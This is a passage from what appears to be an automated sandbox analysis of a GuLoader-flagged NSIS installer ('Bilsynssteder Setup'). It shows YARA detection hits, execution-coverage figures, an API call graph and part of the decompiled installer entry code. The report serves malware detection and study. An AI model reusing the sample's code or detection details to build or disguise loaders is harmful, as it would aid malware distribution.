                                • Rule: JoeSecurity_GuLoader_3, Description: Yara detected GuLoader, Source: 00000000.00000002.782049027.00000000005D0000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_GuLoader_5, Description: Yara detected GuLoader, Source: 00000000.00000002.782394015.0000000002B00000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000000.00000002.782394015.000000000400D000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                Reputation:low


                                  Execution Graph

                                  Execution Coverage:21.1%
                                  Dynamic/Decrypted Code Coverage:15.5%
                                  Signature Coverage:18.7%
                                  Total number of Nodes:1484
                                  Total number of Limit Nodes:52
CreateDialogParamA ShowWindow 4239->4243 4268 405efc 4240->4268 4242->4108 4243->4242 4245->4115 4246->4116 4249 402e82 4247->4249 4248 402eb0 4250 40308e ReadFile 4248->4250 4249->4248 4272 4030c0 SetFilePointer 4249->4272 4252 402ebb 4250->4252 4253 403022 4252->4253 4254 402ecd GetTickCount 4252->4254 4259 40300d 4252->4259 4255 403026 4253->4255 4256 40303e 4253->4256 4254->4259 4267 402f1c 4254->4267 4257 40308e ReadFile 4255->4257 4256->4259 4260 40308e ReadFile 4256->4260 4261 403059 WriteFile 4256->4261 4257->4259 4258 40308e ReadFile 4258->4267 4259->4122 4260->4256 4261->4259 4262 40306e 4261->4262 4262->4256 4262->4259 4263 402f72 GetTickCount 4263->4267 4264 402f97 MulDiv wsprintfA 4265 404ea5 25 API calls 4264->4265 4265->4267 4266 402fd5 WriteFile 4266->4259 4266->4267 4267->4258 4267->4259 4267->4263 4267->4264 4267->4266 4269 405f19 PeekMessageA 4268->4269 4270 402bfe 4269->4270 4271 405f0f DispatchMessageA 4269->4271 4270->4108 4271->4269 4272->4248 4273->4133 4275 40391c 4274->4275 4291 405af6 wsprintfA 4275->4291 4277 40398d 4278 405bba 18 API calls 4277->4278 4279 403999 SetWindowTextA 4278->4279 4280 4036c8 4279->4280 4281 4039b5 4279->4281 4280->4139 4281->4280 4282 405bba 18 API calls 4281->4282 4282->4281 4283->4141 4292 403ef4 4284->4292 4286 404fc1 4287 403ef4 SendMessageA 4286->4287 4288 404fd3 OleUninitialize 4287->4288 4288->4174 4289 404f9a 4289->4286 4290 401389 2 API calls 4289->4290 4290->4289 4291->4277 4293 403f0c 4292->4293 4294 403efd SendMessageA 4292->4294 4293->4289 4294->4293 4295->4183 4297 4056f9 4296->4297 4300 405709 4296->4300 4298 405704 CharNextA 4297->4298 4297->4300 4301 405729 4298->4301 4299 405670 CharNextA 4299->4300 4300->4299 4300->4301 4301->4185 4301->4187 4303 405eb2 FindClose 4302->4303 4304 405ebd 4302->4304 4303->4304 4304->4193 4306 4035bc 4305->4306 4307 403586 4306->4307 4308 4035c1 FreeLibrary GlobalFree 4306->4308 4309 405475 4307->4309 4308->4307 4308->4308 4310 405733 18 API calls 4309->4310 4311 
405495 4310->4311 4312 4054b4 4311->4312 4313 40549d DeleteFileA 4311->4313 4315 4055e2 4312->4315 4349 405b98 lstrcpynA 4312->4349 4314 4033ca OleUninitialize 4313->4314 4314->4043 4314->4044 4315->4314 4320 405e9c 2 API calls 4315->4320 4317 4054da 4318 4054e0 lstrcatA 4317->4318 4319 4054ed 4317->4319 4321 4054f3 4318->4321 4322 40568c 2 API calls 4319->4322 4323 405606 4320->4323 4324 405501 lstrcatA 4321->4324 4325 40550c lstrlenA FindFirstFileA 4321->4325 4322->4321 4323->4314 4326 40560a 4323->4326 4324->4325 4325->4315 4327 405530 4325->4327 4328 405645 3 API calls 4326->4328 4329 405670 CharNextA 4327->4329 4336 4055c1 FindNextFileA 4327->4336 4345 405582 4327->4345 4350 405b98 lstrcpynA 4327->4350 4330 405610 4328->4330 4329->4327 4331 40542d 5 API calls 4330->4331 4332 40561c 4331->4332 4333 405620 4332->4333 4334 405636 4332->4334 4333->4314 4339 404ea5 25 API calls 4333->4339 4335 404ea5 25 API calls 4334->4335 4335->4314 4336->4327 4338 4055d9 FindClose 4336->4338 4338->4315 4340 40562d 4339->4340 4341 405a4c 40 API calls 4340->4341 4344 405634 4341->4344 4343 405475 64 API calls 4343->4345 4344->4314 4345->4336 4345->4343 4346 404ea5 25 API calls 4345->4346 4347 404ea5 25 API calls 4345->4347 4348 405a4c 40 API calls 4345->4348 4351 40542d 4345->4351 4346->4336 4347->4345 4348->4345 4349->4317 4350->4327 4359 405821 GetFileAttributesA 4351->4359 4354 40545a 4354->4345 4355 405450 DeleteFileA 4357 405456 4355->4357 4356 405448 RemoveDirectoryA 4356->4357 4357->4354 4358 405466 SetFileAttributesA 4357->4358 4358->4354 4360 405439 4359->4360 4361 405833 SetFileAttributesA 4359->4361 4360->4354 4360->4355 4360->4356 4361->4360 4363 4058e7 4362->4363 4364 40590d GetShortPathNameA 4362->4364 4386 405846 GetFileAttributesA CreateFileA 4363->4386 4365 405922 4364->4365 4366 405a46 4364->4366 4365->4366 4368 40592a wsprintfA 4365->4368 4366->4214 4371 405bba 18 API calls 4368->4371 4369 4058f1 CloseHandle GetShortPathNameA 4369->4366 4370 405905 4369->4370 
4370->4364 4370->4366 4372 405952 4371->4372 4387 405846 GetFileAttributesA CreateFileA 4372->4387 4374 40595f 4374->4366 4375 40596e GetFileSize GlobalAlloc 4374->4375 4376 405990 ReadFile 4375->4376 4377 405a3f CloseHandle 4375->4377 4376->4377 4378 4059a8 4376->4378 4377->4366 4378->4377 4388 4057ab lstrlenA 4378->4388 4381 4059c1 lstrcpyA 4385 4059e3 4381->4385 4382 4059d5 4383 4057ab 4 API calls 4382->4383 4383->4385 4384 405a1a SetFilePointer WriteFile GlobalFree 4384->4377 4385->4384 4386->4369 4387->4374 4389 4057ec lstrlenA 4388->4389 4390 4057f4 4389->4390 4391 4057c5 lstrcmpiA 4389->4391 4390->4381 4390->4382 4391->4390 4392 4057e3 CharNextA 4391->4392 4392->4389 5079 40260c 5080 402613 5079->5080 5081 40289c 5079->5081 5082 402619 FindClose 5080->5082 5082->5081 5083 40268d 5084 402a07 18 API calls 5083->5084 5086 40269b 5084->5086 5085 4026b1 5088 405821 2 API calls 5085->5088 5086->5085 5087 402a07 18 API calls 5086->5087 5087->5085 5089 4026b7 5088->5089 5109 405846 GetFileAttributesA CreateFileA 5089->5109 5091 4026c4 5092 4026d0 GlobalAlloc 5091->5092 5093 40276d 5091->5093 5094 402764 CloseHandle 5092->5094 5095 4026e9 5092->5095 5096 402775 DeleteFileA 5093->5096 5097 402788 5093->5097 5094->5093 5110 4030c0 SetFilePointer 5095->5110 5096->5097 5099 4026ef 5100 40308e ReadFile 5099->5100 5101 4026f8 GlobalAlloc 5100->5101 5102 402708 5101->5102 5103 40273c WriteFile GlobalFree 5101->5103 5105 402e6c 33 API calls 5102->5105 5104 402e6c 33 API calls 5103->5104 5106 402761 5104->5106 5108 402715 5105->5108 5106->5094 5107 402733 GlobalFree 5107->5103 5108->5107 5109->5091 5110->5099 5111 40278e 5112 4029ea 18 API calls 5111->5112 5113 402794 5112->5113 5114 4027b8 5113->5114 5115 4027cf 5113->5115 5118 40266d 5113->5118 5119 4027bd 5114->5119 5120 4027cc 5114->5120 5116 4027e5 5115->5116 5117 4027d9 5115->5117 5122 405bba 18 API calls 5116->5122 5121 4029ea 18 API calls 5117->5121 5125 405b98 lstrcpynA 5119->5125 5120->5118 5126 405af6 wsprintfA 
5120->5126 5121->5120 5122->5120 5125->5118 5126->5118 5127 401490 5128 404ea5 25 API calls 5127->5128 5129 401497 5128->5129 5130 100015d0 5131 100014d8 4 API calls 5130->5131 5133 100015e8 5131->5133 5132 1000162e GlobalFree 5133->5132 5134 10001603 5133->5134 5135 1000161a VirtualFree 5133->5135 5134->5132 5135->5132 4410 401b11 4411 401b62 4410->4411 4412 401b1e 4410->4412 4414 401b66 4411->4414 4415 401b8b GlobalAlloc 4411->4415 4413 401ba6 4412->4413 4420 401b35 4412->4420 4416 405bba 18 API calls 4413->4416 4424 402224 4413->4424 4414->4424 4431 405b98 lstrcpynA 4414->4431 4417 405bba 18 API calls 4415->4417 4419 40221e 4416->4419 4417->4413 4423 4053c9 MessageBoxIndirectA 4419->4423 4429 405b98 lstrcpynA 4420->4429 4421 401b78 GlobalFree 4421->4424 4423->4424 4425 401b44 4430 405b98 lstrcpynA 4425->4430 4427 401b53 4432 405b98 lstrcpynA 4427->4432 4429->4425 4430->4427 4431->4421 4432->4424 5136 402814 5137 4029ea 18 API calls 5136->5137 5138 40281a 5137->5138 5139 40284b 5138->5139 5140 40266d 5138->5140 5142 402828 5138->5142 5139->5140 5141 405bba 18 API calls 5139->5141 5141->5140 5142->5140 5144 405af6 wsprintfA 5142->5144 5144->5140 4552 401595 4553 402a07 18 API calls 4552->4553 4554 40159c SetFileAttributesA 4553->4554 4555 4015ae 4554->4555 5145 401c95 5146 4029ea 18 API calls 5145->5146 5147 401c9c 5146->5147 5148 4029ea 18 API calls 5147->5148 5149 401ca4 GetDlgItem 5148->5149 5150 4024c9 5149->5150 4561 402517 4562 4029ea 18 API calls 4561->4562 4564 402521 4562->4564 4563 402597 4564->4563 4565 402555 ReadFile 4564->4565 4566 402599 4564->4566 4567 4025a9 4564->4567 4565->4563 4565->4564 4570 405af6 wsprintfA 4566->4570 4567->4563 4569 4025bf SetFilePointer 4567->4569 4569->4563 4570->4563 5151 10001058 5152 1000123b 3 API calls 5151->5152 5154 10001074 5152->5154 5153 100010dc 5154->5153 5155 10001091 5154->5155 5156 100014d8 4 API calls 5154->5156 5157 100014d8 4 API calls 5155->5157 5156->5155 5158 100010a1 5157->5158 5159 100010b1 
5158->5159 5160 100010a8 GlobalSize 5158->5160 5161 100010b5 GlobalAlloc 5159->5161 5162 100010c6 5159->5162 5160->5159 5163 100014ff 3 API calls 5161->5163 5164 100010d1 GlobalFree 5162->5164 5163->5162 5164->5153 4588 404e19 4589 404e29 4588->4589 4590 404e3d 4588->4590 4592 404e86 4589->4592 4593 404e2f 4589->4593 4591 404e45 IsWindowVisible 4590->4591 4600 404e65 4590->4600 4591->4592 4595 404e52 4591->4595 4596 404e8b CallWindowProcA 4592->4596 4594 403ef4 SendMessageA 4593->4594 4597 404e39 4594->4597 4598 404770 5 API calls 4595->4598 4596->4597 4599 404e5c 4598->4599 4599->4600 4600->4596 4601 4047f0 4 API calls 4600->4601 4601->4592 4612 40231a 4613 402320 4612->4613 4614 402a07 18 API calls 4613->4614 4615 402332 4614->4615 4616 402a07 18 API calls 4615->4616 4617 40233c RegCreateKeyExA 4616->4617 4618 402366 4617->4618 4621 40266d 4617->4621 4619 40237e 4618->4619 4620 402a07 18 API calls 4618->4620 4623 4029ea 18 API calls 4619->4623 4625 40238a 4619->4625 4622 402377 lstrlenA 4620->4622 4622->4619 4623->4625 4624 4023a5 RegSetValueExA 4627 4023bb RegCloseKey 4624->4627 4625->4624 4626 402e6c 33 API calls 4625->4626 4626->4624 4627->4621 5165 40429f 5166 4042d5 5165->5166 5167 4042af 5165->5167 5169 403f0f 8 API calls 5166->5169 5168 403ea8 19 API calls 5167->5168 5170 4042bc SetDlgItemTextA 5168->5170 5171 4042e1 5169->5171 5170->5166 5172 100010e0 5173 1000110e 5172->5173 5174 1000123b 3 API calls 5173->5174 5178 1000111e 5174->5178 5175 100011c4 GlobalFree 5176 100012bf 2 API calls 5176->5178 5177 100011c3 5177->5175 5178->5175 5178->5176 5178->5177 5179 1000123b 3 API calls 5178->5179 5180 10001278 2 API calls 5178->5180 5181 10001155 GlobalAlloc 5178->5181 5182 100011ea GlobalFree 5178->5182 5183 100011b1 GlobalFree 5178->5183 5184 100012e8 lstrcpyA 5178->5184 5179->5178 5180->5183 5181->5178 5182->5178 5183->5178 5184->5178 5185 4016a1 5186 402a07 18 API calls 5185->5186 5187 4016a7 GetFullPathNameA 5186->5187 5188 4016be 5187->5188 5194 4016df 
5187->5194 5191 405e9c 2 API calls 5188->5191 5188->5194 5189 4016f3 GetShortPathNameA 5190 40289c 5189->5190 5192 4016cf 5191->5192 5192->5194 5195 405b98 lstrcpynA 5192->5195 5194->5189 5194->5190 5195->5194 3637 404822 GetDlgItem GetDlgItem 3638 404874 7 API calls 3637->3638 3653 404a8c 3637->3653 3639 404917 DeleteObject 3638->3639 3640 40490a SendMessageA 3638->3640 3641 404920 3639->3641 3640->3639 3643 404957 3641->3643 3692 405bba 3641->3692 3642 404b70 3645 404c1c 3642->3645 3649 404e04 3642->3649 3657 404bc9 SendMessageA 3642->3657 3710 403ea8 3643->3710 3650 404c26 SendMessageA 3645->3650 3651 404c2e 3645->3651 3647 404b51 3647->3642 3659 404b62 SendMessageA 3647->3659 3648 40496b 3656 403ea8 19 API calls 3648->3656 3737 403f0f 3649->3737 3650->3651 3660 404c40 ImageList_Destroy 3651->3660 3661 404c47 3651->3661 3669 404c57 3651->3669 3653->3642 3653->3647 3654 404aec 3653->3654 3715 404770 SendMessageA 3654->3715 3672 404979 3656->3672 3657->3649 3663 404bde SendMessageA 3657->3663 3659->3642 3660->3661 3665 404c50 GlobalFree 3661->3665 3661->3669 3662 404dc6 3662->3649 3670 404dd8 ShowWindow GetDlgItem ShowWindow 3662->3670 3667 404bf1 3663->3667 3665->3669 3666 404a4d GetWindowLongA SetWindowLongA 3671 404a66 3666->3671 3678 404c02 SendMessageA 3667->3678 3668 404afd 3668->3647 3669->3662 3687 404c92 3669->3687 3720 4047f0 3669->3720 3670->3649 3673 404a84 3671->3673 3674 404a6c ShowWindow 3671->3674 3672->3666 3677 4049c8 SendMessageA 3672->3677 3679 404a47 3672->3679 3680 404a04 SendMessageA 3672->3680 3681 404a15 SendMessageA 3672->3681 3714 403edd SendMessageA 3673->3714 3713 403edd SendMessageA 3674->3713 3677->3672 3678->3645 3679->3666 3679->3671 3680->3672 3681->3672 3683 404a7f 3683->3649 3684 404d9c InvalidateRect 3684->3662 3685 404db2 3684->3685 3729 40468e 3685->3729 3686 404cc0 SendMessageA 3690 404cd6 3686->3690 3687->3686 3687->3690 3689 404d37 3691 404d4a SendMessageA SendMessageA 3689->3691 3690->3684 3690->3689 3690->3691 3691->3690 
3708 405bc7 3692->3708 3693 405dea 3694 404939 SendMessageA SendMessageA 3693->3694 3767 405b98 lstrcpynA 3693->3767 3694->3641 3696 405c68 GetVersion 3696->3708 3697 405dc1 lstrlenA 3697->3708 3698 405bba 10 API calls 3698->3697 3701 405ce0 GetSystemDirectoryA 3701->3708 3703 405cf3 GetWindowsDirectoryA 3703->3708 3705 405bba 10 API calls 3705->3708 3706 405d6a lstrcatA 3706->3708 3707 405d27 SHGetSpecialFolderLocation 3707->3708 3709 405d3f SHGetPathFromIDListA CoTaskMemFree 3707->3709 3708->3693 3708->3696 3708->3697 3708->3698 3708->3701 3708->3703 3708->3705 3708->3706 3708->3707 3751 405a7f RegOpenKeyExA 3708->3751 3756 405e03 3708->3756 3765 405af6 wsprintfA 3708->3765 3766 405b98 lstrcpynA 3708->3766 3709->3708 3711 405bba 18 API calls 3710->3711 3712 403eb3 SetDlgItemTextA 3711->3712 3712->3648 3713->3683 3714->3653 3716 404793 GetMessagePos ScreenToClient SendMessageA 3715->3716 3717 4047cf SendMessageA 3715->3717 3718 4047c7 3716->3718 3719 4047cc 3716->3719 3717->3718 3718->3668 3719->3717 3772 405b98 lstrcpynA 3720->3772 3722 404803 3773 405af6 wsprintfA 3722->3773 3724 40480d 3774 40140b 3724->3774 3728 40481d 3728->3687 3730 4046a8 3729->3730 3731 405bba 18 API calls 3730->3731 3732 4046dd 3731->3732 3733 405bba 18 API calls 3732->3733 3734 4046e8 3733->3734 3735 405bba 18 API calls 3734->3735 3736 404719 lstrlenA wsprintfA SetDlgItemTextA 3735->3736 3736->3662 3738 403f27 GetWindowLongA 3737->3738 3748 403fb0 3737->3748 3739 403f38 3738->3739 3738->3748 3740 403f47 GetSysColor 3739->3740 3741 403f4a 3739->3741 3740->3741 3742 403f50 SetTextColor 3741->3742 3743 403f5a SetBkMode 3741->3743 3742->3743 3744 403f72 GetSysColor 3743->3744 3745 403f78 3743->3745 3744->3745 3746 403f89 3745->3746 3747 403f7f SetBkColor 3745->3747 3746->3748 3749 403fa3 CreateBrushIndirect 3746->3749 3750 403f9c DeleteObject 3746->3750 3747->3746 3749->3748 3750->3749 3752 405af0 3751->3752 3753 405ab2 RegQueryValueExA 3751->3753 3752->3708 3754 405ad3 RegCloseKey 
3753->3754 3754->3752 3763 405e0f 3756->3763 3757 405e77 3758 405e7b CharPrevA 3757->3758 3760 405e96 3757->3760 3758->3757 3759 405e6c CharNextA 3759->3757 3759->3763 3760->3708 3762 405e5a CharNextA 3762->3763 3763->3757 3763->3759 3763->3762 3764 405e67 CharNextA 3763->3764 3768 405670 3763->3768 3764->3759 3765->3708 3766->3708 3767->3694 3769 405676 3768->3769 3770 405689 3769->3770 3771 40567c CharNextA 3769->3771 3770->3763 3771->3769 3772->3722 3773->3724 3778 401389 3774->3778 3777 405b98 lstrcpynA 3777->3728 3780 401390 3778->3780 3779 4013fe 3779->3777 3780->3779 3781 4013cb MulDiv SendMessageA 3780->3781 3781->3780 5196 402626 5197 402629 5196->5197 5198 402641 5196->5198 5200 402636 FindNextFileA 5197->5200 5199 4027c7 5198->5199 5202 405b98 lstrcpynA 5198->5202 5200->5198 5202->5199 5203 401d26 GetDC GetDeviceCaps 5204 4029ea 18 API calls 5203->5204 5205 401d44 MulDiv ReleaseDC 5204->5205 5206 4029ea 18 API calls 5205->5206 5207 401d63 5206->5207 5208 405bba 18 API calls 5207->5208 5209 401d9c CreateFontIndirectA 5208->5209 5210 4024c9 5209->5210 5211 404628 5212 404654 5211->5212 5213 404638 5211->5213 5215 404687 5212->5215 5216 40465a SHGetPathFromIDListA 5212->5216 5222 4053ad GetDlgItemTextA 5213->5222 5218 40466a 5216->5218 5221 404671 SendMessageA 5216->5221 5217 404645 SendMessageA 5217->5212 5220 40140b 2 API calls 5218->5220 5220->5221 5221->5215 5222->5217 4393 40172c 4394 402a07 18 API calls 4393->4394 4395 401733 4394->4395 4396 405875 2 API calls 4395->4396 4397 40173a 4396->4397 4398 405875 2 API calls 4397->4398 4398->4397 4399 401dac 4407 4029ea 4399->4407 4401 401db2 4402 4029ea 18 API calls 4401->4402 4403 401dbb 4402->4403 4404 401dc2 ShowWindow 4403->4404 4405 401dcd EnableWindow 4403->4405 4406 40289c 4404->4406 4405->4406 4408 405bba 18 API calls 4407->4408 4409 4029fe 4408->4409 4409->4401 5223 401eac 5224 402a07 18 API calls 5223->5224 5225 401eb3 5224->5225 5226 405e9c 2 API calls 5225->5226 5227 401eb9 5226->5227 5229 401ecb 
5227->5229 5230 405af6 wsprintfA 5227->5230 5230->5229 5231 40192d 5232 402a07 18 API calls 5231->5232 5233 401934 lstrlenA 5232->5233 5234 4024c9 5233->5234 5235 4024ad 5236 402a07 18 API calls 5235->5236 5237 4024b4 5236->5237 5240 405846 GetFileAttributesA CreateFileA 5237->5240 5239 4024c0 5240->5239 5241 401cb0 5242 4029ea 18 API calls 5241->5242 5243 401cc0 SetWindowLongA 5242->5243 5244 40289c 5243->5244 5245 401a31 5246 4029ea 18 API calls 5245->5246 5247 401a37 5246->5247 5248 4029ea 18 API calls 5247->5248 5249 4019e1 5248->5249 4439 401e32 4440 402a07 18 API calls 4439->4440 4441 401e38 4440->4441 4442 404ea5 25 API calls 4441->4442 4443 401e42 4442->4443 4444 405368 2 API calls 4443->4444 4448 401e48 4444->4448 4445 401e9e CloseHandle 4447 40266d 4445->4447 4446 401e67 WaitForSingleObject 4446->4448 4449 401e75 GetExitCodeProcess 4446->4449 4448->4445 4448->4446 4448->4447 4450 405efc 2 API calls 4448->4450 4451 401e92 4449->4451 4452 401e87 4449->4452 4450->4446 4451->4445 4454 401e90 4451->4454 4455 405af6 wsprintfA 4452->4455 4454->4445 4455->4454 4456 4015b3 4457 402a07 18 API calls 4456->4457 4458 4015ba 4457->4458 4459 4056de 4 API calls 4458->4459 4470 4015c2 4459->4470 4460 40160a 4462 401638 4460->4462 4463 40160f 4460->4463 4461 405670 CharNextA 4464 4015d0 CreateDirectoryA 4461->4464 4467 401423 25 API calls 4462->4467 4465 401423 25 API calls 4463->4465 4466 4015e5 GetLastError 4464->4466 4464->4470 4468 401616 4465->4468 4469 4015f2 GetFileAttributesA 4466->4469 4466->4470 4473 401630 4467->4473 4474 405b98 lstrcpynA 4468->4474 4469->4470 4470->4460 4470->4461 4472 401621 SetCurrentDirectoryA 4472->4473 4474->4472 5250 402036 5251 402a07 18 API calls 5250->5251 5252 40203d 5251->5252 5253 402a07 18 API calls 5252->5253 5254 402047 5253->5254 5255 402a07 18 API calls 5254->5255 5256 402050 5255->5256 5257 402a07 18 API calls 5256->5257 5258 40205a 5257->5258 5259 402a07 18 API calls 5258->5259 5260 402064 5259->5260 5261 402078 
CoCreateInstance 5260->5261 5262 402a07 18 API calls 5260->5262 5265 402097 5261->5265 5266 40214d 5261->5266 5262->5261 5263 401423 25 API calls 5264 40217f 5263->5264 5265->5266 5267 40212c MultiByteToWideChar 5265->5267 5266->5263 5266->5264 5267->5266 5268 10002977 5269 1000298f 5268->5269 5270 10001551 2 API calls 5269->5270 5271 100029aa 5270->5271 5272 4014b7 5273 4014bd 5272->5273 5274 401389 2 API calls 5273->5274 5275 4014c5 5274->5275 4577 402438 4578 402b11 19 API calls 4577->4578 4579 402442 4578->4579 4580 4029ea 18 API calls 4579->4580 4581 40244b 4580->4581 4582 402455 4581->4582 4585 40266d 4581->4585 4583 402462 RegEnumKeyA 4582->4583 4584 40246e RegEnumValueA 4582->4584 4586 402487 RegCloseKey 4583->4586 4584->4585 4584->4586 4586->4585 5276 401bb8 5277 4029ea 18 API calls 5276->5277 5278 401bbf 5277->5278 5279 4029ea 18 API calls 5278->5279 5280 401bc9 5279->5280 5281 402a07 18 API calls 5280->5281 5283 401bd9 5280->5283 5281->5283 5282 401be9 5285 401bf4 5282->5285 5286 401c38 5282->5286 5283->5282 5284 402a07 18 API calls 5283->5284 5284->5282 5288 4029ea 18 API calls 5285->5288 5287 402a07 18 API calls 5286->5287 5289 401c3d 5287->5289 5290 401bf9 5288->5290 5292 402a07 18 API calls 5289->5292 5291 4029ea 18 API calls 5290->5291 5293 401c02 5291->5293 5294 401c46 FindWindowExA 5292->5294 5295 401c28 SendMessageA 5293->5295 5296 401c0a SendMessageTimeoutA 5293->5296 5297 401c64 5294->5297 5295->5297 5296->5297 4602 402239 4603 402241 4602->4603 4604 402247 4602->4604 4605 402a07 18 API calls 4603->4605 4606 402a07 18 API calls 4604->4606 4607 402257 4604->4607 4605->4604 4606->4607 4608 402a07 18 API calls 4607->4608 4610 402265 4607->4610 4608->4610 4609 402a07 18 API calls 4611 40226e WritePrivateProfileStringA 4609->4611 4610->4609 5298 403fbc lstrcpynA lstrlenA 4638 4022be 4639 4022c3 4638->4639 4640 4022ee 4638->4640 4642 402b11 19 API calls 4639->4642 4641 402a07 18 API calls 4640->4641 4643 4022f5 4641->4643 4644 4022ca 4642->4644 4650 
402a47 RegOpenKeyExA 4643->4650 4645 4022d4 4644->4645 4649 40230b 4644->4649 4646 402a07 18 API calls 4645->4646 4647 4022db RegDeleteValueA RegCloseKey 4646->4647 4647->4649 4651 402adb 4650->4651 4654 402a72 4650->4654 4651->4649 4652 402a98 RegEnumKeyA 4653 402aaa RegCloseKey 4652->4653 4652->4654 4655 405ec3 3 API calls 4653->4655 4654->4652 4654->4653 4656 402acf RegCloseKey 4654->4656 4657 402a47 3 API calls 4654->4657 4658 402aba 4655->4658 4659 402abe 4656->4659 4657->4654 4658->4659 4660 402aea RegDeleteKeyA 4658->4660 4659->4651 4660->4659 4661 40173f 4662 402a07 18 API calls 4661->4662 4663 401746 4662->4663 4664 401764 4663->4664 4665 40176c 4663->4665 4700 405b98 lstrcpynA 4664->4700 4701 405b98 lstrcpynA 4665->4701 4668 40176a 4672 405e03 5 API calls 4668->4672 4669 401777 4670 405645 3 API calls 4669->4670 4671 40177d lstrcatA 4670->4671 4671->4668 4684 401789 4672->4684 4673 405e9c 2 API calls 4673->4684 4674 405821 2 API calls 4674->4684 4676 4017a0 CompareFileTime 4676->4684 4677 401864 4678 404ea5 25 API calls 4677->4678 4680 40186e 4678->4680 4679 404ea5 25 API calls 4689 401850 4679->4689 4681 402e6c 33 API calls 4680->4681 4683 401881 4681->4683 4682 405b98 lstrcpynA 4682->4684 4685 401895 SetFileTime 4683->4685 4687 4018a7 FindCloseChangeNotification 4683->4687 4684->4673 4684->4674 4684->4676 4684->4677 4684->4682 4686 405bba 18 API calls 4684->4686 4695 4053c9 MessageBoxIndirectA 4684->4695 4698 40183b 4684->4698 4699 405846 GetFileAttributesA CreateFileA 4684->4699 4685->4687 4686->4684 4688 4018b8 4687->4688 4687->4689 4690 4018d0 4688->4690 4691 4018bd 4688->4691 4692 405bba 18 API calls 4690->4692 4693 405bba 18 API calls 4691->4693 4694 4018d8 4692->4694 4696 4018c5 lstrcatA 4693->4696 4697 4053c9 MessageBoxIndirectA 4694->4697 4695->4684 4696->4694 4697->4689 4698->4679 4698->4689 4699->4684 4700->4668 4701->4669 5299 40163f 5300 402a07 18 API calls 5299->5300 5301 401645 5300->5301 5302 405e9c 2 API calls 5301->5302 5303 40164b 
5302->5303 5304 40193f 5305 4029ea 18 API calls 5304->5305 5306 401946 5305->5306 5307 4029ea 18 API calls 5306->5307 5308 401950 5307->5308 5309 402a07 18 API calls 5308->5309 5310 401959 5309->5310 5311 40196c lstrlenA 5310->5311 5313 4019a7 5310->5313 5312 401976 5311->5312 5312->5313 5317 405b98 lstrcpynA 5312->5317 5315 401990 5315->5313 5316 40199d lstrlenA 5315->5316 5316->5313 5317->5315

                                  Control-flow Graph

                                  [Control-flow graph for the function starting at 40310b; nodes are marked as executed or not executed.]
                                  C-Code - Quality: 87%
                                  			_entry_() {
                                  				int _t38;
                                  				CHAR* _t43;
                                  				char* _t46;
                                  				CHAR* _t48;
                                  				void* _t52;
                                  				intOrPtr _t54;
                                  				int _t56;
                                  				int _t59;
                                  				int _t60;
                                  				int _t64;
                                  				intOrPtr _t78;
                                  				intOrPtr _t84;
                                  				void* _t86;
                                  				signed int _t100;
                                  				void* _t103;
                                  				void* _t108;
                                  				char _t110;
                                  				int _t129;
                                  				int _t130;
                                  				CHAR* _t137;
                                  				int _t138;
                                  				int _t140;
                                  				intOrPtr* _t143;
                                  				char* _t146;
                                  				int _t147;
                                  				void* _t148;
                                  				void* _t149;
                                  				intOrPtr _t156;
                                  				char _t166;
                                  
                                  				 *(_t149 + 0x18) = 0;
                                  				 *((intOrPtr*)(_t149 + 0x10)) = "Error writing temporary file. Make sure your temp folder is valid.";
                                  				 *(_t149 + 0x20) = 0;
                                  				 *((char*)(_t149 + 0x14)) = 0x20;
                                  				__imp__#17();
                                  				_t38 = SetErrorMode(0x8001); // executed
                                  				__imp__OleInitialize(0); // executed
                                  				 *0x42ec58 = _t38;
                                  				 *0x42eba4 = E00405EC3(8);
                                  				SHGetFileInfoA(0x428fe0, 0, _t149 + 0x38, 0x160, 0); // executed
                                  				E00405B98("Bilsynssteder Setup", "NSIS Error");
                                  				_t43 = GetCommandLineA();
                                  				_t146 = "\"C:\\Users\\hardz\\Desktop\\SC.028UCCP.exe\"";
                                  				E00405B98(_t146, _t43);
                                  				 *0x42eba0 = GetModuleHandleA(0);
                                  				_t46 = _t146;
                                  				if("\"C:\\Users\\hardz\\Desktop\\SC.028UCCP.exe\"" == 0x22) {
                                  					 *((char*)(_t149 + 0x14)) = 0x22;
                                  					_t46 =  &M00434001;
                                  				}
                                  				_t48 = CharNextA(E00405670(_t46,  *((intOrPtr*)(_t149 + 0x14))));
                                  				 *(_t149 + 0x1c) = _t48;
                                  				while(1) {
                                  					_t110 =  *_t48;
                                  					_t151 = _t110;
                                  					if(_t110 == 0) {
                                  						break;
                                  					}
                                  					__eflags = _t110 - 0x20;
                                  					if(_t110 != 0x20) {
                                  						L5:
                                  						__eflags =  *_t48 - 0x22;
                                  						 *((char*)(_t149 + 0x14)) = 0x20;
                                  						if( *_t48 == 0x22) {
                                  							_t48 =  &(_t48[1]);
                                  							__eflags = _t48;
                                  							 *((char*)(_t149 + 0x14)) = 0x22;
                                  						}
                                  						__eflags =  *_t48 - 0x2f;
                                  						if( *_t48 != 0x2f) {
                                  							L17:
                                  							_t48 = E00405670(_t48,  *((intOrPtr*)(_t149 + 0x14)));
                                  							__eflags =  *_t48 - 0x22;
                                  							if(__eflags == 0) {
                                  								_t48 =  &(_t48[1]);
                                  								__eflags = _t48;
                                  							}
                                  							continue;
                                  						}
                                  						_t48 =  &(_t48[1]);
                                  						__eflags =  *_t48 - 0x53;
                                  						if( *_t48 != 0x53) {
                                  							L12:
                                  							__eflags =  *_t48 - ((( *0x40917b << 0x00000008 |  *0x40917a) << 0x00000008 |  *0x409179) << 0x00000008 | "NCRC");
                                  							if( *_t48 != ((( *0x40917b << 0x00000008 |  *0x40917a) << 0x00000008 |  *0x409179) << 0x00000008 | "NCRC")) {
                                  								L16:
                                  								__eflags =  *((intOrPtr*)(_t48 - 2)) - ((( *0x409173 << 0x00000008 |  *0x409172) << 0x00000008 |  *0x409171) << 0x00000008 | " /D=");
                                  								if( *((intOrPtr*)(_t48 - 2)) == ((( *0x409173 << 0x00000008 |  *0x409172) << 0x00000008 |  *0x409171) << 0x00000008 | " /D=")) {
                                  									 *((char*)(_t48 - 2)) = 0;
                                  									__eflags =  &(_t48[2]);
                                  									E00405B98("C:\\Users\\hardz\\AppData\\Local\\Temp\\Unepitomizeds\\Indlaansrenter",  &(_t48[2]));
                                  									break;
                                  								}
                                  								goto L17;
                                  							}
                                  							_t129 = _t48[4];
